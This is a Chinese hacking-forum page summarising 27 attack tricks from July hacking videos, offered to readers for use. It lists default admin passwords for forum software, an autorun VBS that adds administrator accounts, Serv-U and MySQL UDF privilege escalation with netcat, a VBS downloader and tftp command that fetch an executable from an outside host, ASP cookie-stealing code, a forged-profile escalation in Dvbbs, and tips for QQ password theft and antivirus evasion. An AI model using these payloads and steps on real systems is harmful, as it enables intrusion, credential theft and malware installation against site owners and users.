首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 漏洞利用

7月黑客动画总结(一)


http://www.gipsky.com/
下面几条都是利用默认设置,思路是前台传gif马,后台恢复数据

1.搜索: 共有 1 位会员 新进来宾 [admin] 动网的默认用户密码:admin admin888 动网默认文件路径: UploadFile/



2.搜索: 主题:LDBBS论坛Bug收集 默认用户:wyd1520 admin888 默认文件路径:..\MemberFile\TopicFile\200563014371782.gif



3.搜索: 欢迎我们的新会员 admin 默认为:admin admin admin admin888



4.搜索: 你的位置: 6K论坛 7.0 默认用户:admin 6kadmin



5.做Rm木马里面用到的txt里面是可以写两个地址的,我们可以写入一个假页面,另一个写exe木马地址

比如: u 00:00:05.0 00:00:15.0 http://www.hack6.com/3721.htm (做好的3721的假页面)

u 00:00:05.0 00:00:15.0 http://www.hack6.com/3721.exe (下载木马)



6.北京刷q币简单方法

在肉鸡上运行 Dialupass.exe /allusers /stext "c:\ating.txt" 将密码存到ating.txt里(工具在我网站有下载),再骗到对方的电话号码后四位,到http://cnc.qq.com/bj/



7.搜索关键字:2001-2002 Qcdn All Rights Reserved. 是青创文章系统,用admin admin登陆后台,在编辑css里写入小马,再用数据库备份来变成asp马



8.动网7.0.0sp2漏洞

申请一个账号ating

然后修改基本资料,换个头像,抓POST /mymodify.asph和他的下一个包,替换myface=后面为

images/userface/image1.gif|||32|||32|||2003-12-30 16:34:00|||2005-6-19 18:04:06|||25|||0|||管理员|||1||||||120|||115|||28|||0||||||www.hack6.com||| ... 124;|0|0|0 ||||||Dvbbs,加上多出的字节数,然后nc提交,提权为前台管理员,可以在斑竹版面管理里的基本信息里挂马,也可以用固顶漏洞再提升到后台管理员



9.简单控制网吧,用radmin做好包,用阿D网络工具包扫服务器ip,种植



10.MS05017溢出,用ssport扫2103端口,然后用批量溢出导入MS05017.exe溢出,后缀参数为2103 TOM-YEZOZ1Y43IO 1234 8



11.传奇网站MirCMS带有一个7.0的动网data/mircms_bbs_dvbbs7_010101.mdb或databackup/mircms_bbs_dvbbs7_010101.mdb很多管理员都没改默认设置



12.serv-u提权,CMD命令里输入d:\wwwroot\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本机的43598端口转发到81端口,打开我们自己机子上的SERV-U连上他,自己加个用户,再在cmd下连接他提权



13.根目录下写个命令提权

auto.ini 和 SHELL.VBS

autorun.inf 文件

[autorun]

open=shell.vbs 文件

shell.vbs

dim wsh?

set wsh=createObject("WScript.Shell")

wsh.run "net user guest /active:yes",0

wsh.run "net user guest ating",0

wsh.run "net localgroup administrators guest /add",0

wsh.run "net user ating ating /add",0

wsh.run "net localgroup administrators ating /add",0

wsh.run "cmd.exe /c del autorun.inf",0

wsh.run "cmd.exe /c del shell.vbs",0

这样要可以访问到对方的根目录,将这两个文件放到对方硬盘的根目录下。当然你也可以直接执行木马程序,还要一个木马程序,但是语句就和最后两句一样,通过CMD执行木马程序.



14.编写一个启动/关机脚本配置文件scripts.ini,这个文件名是固定的,不能改变。内容如下:

[Startup]

0CmdLine=ating.bat

0Parameters=

将文件scripts.ini保存到“C:\winnt\system32\GroupPolicy\Machine\Scripts” ATING.BAT的内容自己定,加管理员什么的,但是要依赖重启。



15.注入碰到SA时上传总结

(1)找到WEB路径用NBSI自带的上传一句话木马

(2)本地用tftp32架一TFTP服务器,NBSI的NBCommander执行

tftp -i 218.201.49.92 get ating.exe c:\ating.exe

(3)FTP上传,我在总结二里讲了

(4)VBS脚本下载,hack520总结的,在NBSI执行命令那里输入:

echo Set xPost = createObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://soft.163vv.com/77169/c.exe^",0:xPost.Send():Set sGet = createObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:\c.exe^",2 >pig.vbs

意思是下载http://soft.163vv.com/77169/c.exe然后保存到c:\c.exe

要用的朋友只需要把里面的网址改为自己的就行了,在NBSI中执行,输入cscript pig.vbs

(4)EXE2BAT法,用exe2bat转换,一行一行的在NBSI那里写入,把前面的@echo off 和每行开头的@echo去掉就行了



16.上海冲游戏点卡是不要ip验证的,大家快冲吧



17安全挂QQ,到http://www.skycn.com/soft/13.html下载软件,运行软件,地址填http://wap.qq.com,登陆



18.有时候我们溢出得到了cmdshell,可以先看看此ip有没有站点论坛什么的,传个gif马上去,然后在cmdshell下还原成asp或php马,在马下传开3389工具



19.有时候在后台传不上马,但在发表文章处可以发现是ewebeditor的系统,搜索源文件,搜src可以看到ewebeditor的路径,/admin_login.asp登陆,默认用户密码admin



20.超简单破解本地QQ,QQ版本QQ2005BATE1,先进入QQ的登陆窗口,

然后选种你想要登陆的QQ,首先随便打几个密码,大概3-4遍后保持错误状态不要关闭,然后进入QQ的根目录里面,找到你破解的那个QQ的文件夹然后在地址后面打上password.txt,最后一行就是密码



21.http://www.8n8.cn/qq/答案为ACAC,免费获得3个月会员的号码



22.动网超市插件默认数据库 /bbs/data/shop.asp 先买个商品,在送人的祝福语里插入一句话木马,或像上次总结的,在申请入驻里插入一句话木马



23.搜索Powered By :Dvbbs Version 7.0.0 Sp2,用xpfox的提权工具很容易提权的,菜鸟快试试

在提升到后台管理员就比较麻烦,提不上去的话,除了上面总结的挂马外,还可以进入分版广告设置,把默认内容改成

[code]



[/code]或者其他的,

还可以盗cookie,输入主题的旁边选择HTML支持,插入获取COOKIES的代码

[code][/code]

写个盗cookie.asp的代码到自己的空间上

[code]<%

cookiefile=Server.MapPath("cookie.txt")

set fs=server.createObject("scripting.filesystemobject")

set cookiefile=fs.OpenTextfile(cookiefile,8,True,0)

cookiefile.Write(Request.QueryString&"
")

cookiefile.close

set fs = nothing

%> [/code]

获取到cookie后目录下会出现一个cookie.txt的文件里面也许就有管理员密码



24.MySql本地提升,hack520写的,利用Mix.dll或my_udf.dll可以直接拿到系统权限,cmd下进入MYSQL的安装目录,输入mysql -uroot -p ,密码为空,登陆。

再输入create function Mixconnect returns string soname 'c:\\Mix\\Mix.dll'; 注册dll

NC监听1234端口,nc -l -p 1234 ,MYSQL的那个CMD窗口输入select Mixconnect('127.0.0.1','1234');,KILL掉mysql的服务进程,重起服务



25.用网站猎手搜别人的马,比如data/admin_news.asp,data/new.asp,images/diy.asp,data/diy.asp,diy.asp,angel.asp,image/angel.asp,images/ok.asp



26.制作免杀的QQ大盗,用PEID脱壳,然后用ResScope导出个exefile,比如QQ1,因为他最小,以防导不回去,然后把它加壳,导回到QQ1,2,3,4,生成的马(四个选项随便选)就免杀了



27.网吧开注册表,(1)建个txt,内容为REGEDIT,保存为ating.bat,双击即可.(2)建个word文档,插入对象,包,随便导个exe,编辑,命令行,输入REGEDIT,更新,运行。


Tags: 漏洞[/code]
[/code]
<< 入侵动易2005所用的SQL语句 7月黑客动画总结(二) >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号